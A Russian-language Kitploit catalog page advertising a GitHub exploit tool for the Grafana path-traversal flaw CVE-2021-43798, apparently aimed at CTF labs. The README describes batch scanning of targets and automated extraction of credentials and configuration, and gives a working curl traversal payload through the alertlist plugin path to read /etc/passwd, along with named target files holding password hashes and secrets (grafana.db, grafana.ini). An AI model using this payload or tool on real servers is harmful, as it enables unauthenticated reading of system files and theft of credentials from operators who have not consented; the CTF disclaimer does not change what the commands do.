Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
-Grafana-LFI-CVE-2021-43798 — 📂 Grafana LFI Exploit (CVE-2021-43798). Автоматизированное извлечение учетных данных и конфигурации. 🕵️ | Kitploit
Инструменты/GitHubGitHub/kikechans/-grafana-lfi-cve-2021-43798
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииCTFТестирование на Проникновение
GitHubkikechans/-grafana-lfi-cve-2021-43798

-Grafana-LFI-CVE-2021-43798

📂 Grafana LFI Exploit (CVE-2021-43798). Автоматизированное извлечение учетных данных и конфигурации. 🕵️

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
4 месяцев назадЕщё не проверено

🚀 Grafana LFI Exploit (CVE-2021-43798)

Скрипт автоматизации на Python 3 для эксплуатации уязвимости Local File Inclusion (LFI) в Grafana (версии с 8.0.0 по 8.3.0). Этот эксплойт позволяет выполнить обход каталогов для чтения конфиденциальных файлов операционной системы без аутентификации. ✨ Особенности

root@kitploit:~
Совместимость с Python 3.10+: Исправлено для работы с современными версиями Python (исправление collections.Mapping).

Пакетное сканирование: Возможность обработки нескольких целей с помощью файла targets.txt.

Расшифровка данных: Включает модули для работы с сессиями и зашифрованными данными Grafana.

Оптимизирован для CTF: Чистый и прямой вывод, идеально подходит для лабораторий HackTheBox и TryHackMe.

🛠️ Требования и установка

Из-за зависимостей от старых библиотек рекомендуется установить следующие пакеты: Bash

pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages

root@kitploit:~
Примечание: Если вы используете Python 3.10 или новее, скрипт включает автоматический патч для совместимости с collections.abc.

🚀 Использование

root@kitploit:~
Настройка целей: Добавьте URL-адреса (с портом) в файл targets.txt.
Bash

echo "http://10.129.234.47:3000" > targets.txt

Запустите эксплойт:
Bash

python3 exploit.py

🎯 Цели для чтения (LFI)

После запуска вы можете попытаться прочитать критические файлы, такие как:

root@kitploit:~
/etc/passwd (Пользователи системы)

/var/lib/grafana/grafana.db (База данных с хэшами пользователей)

/etc/grafana/grafana.ini (Конфигурация и секреты)

💡 Альтернативный метод (вручную)

Если вы предпочитаете не использовать скрипт, вы можете напрямую воспользоваться LFI через curl: Bash

curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

⚠️ Отказ от ответственности

Этот репозиторий создан исключительно в образовательных целях и для использования в контролируемых средах (CTF, лаборатории). Автор не несет ответственности за неправомерное использование данного инструмента. 🏷️ Topics (Теги)

grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal

Скачать инструмент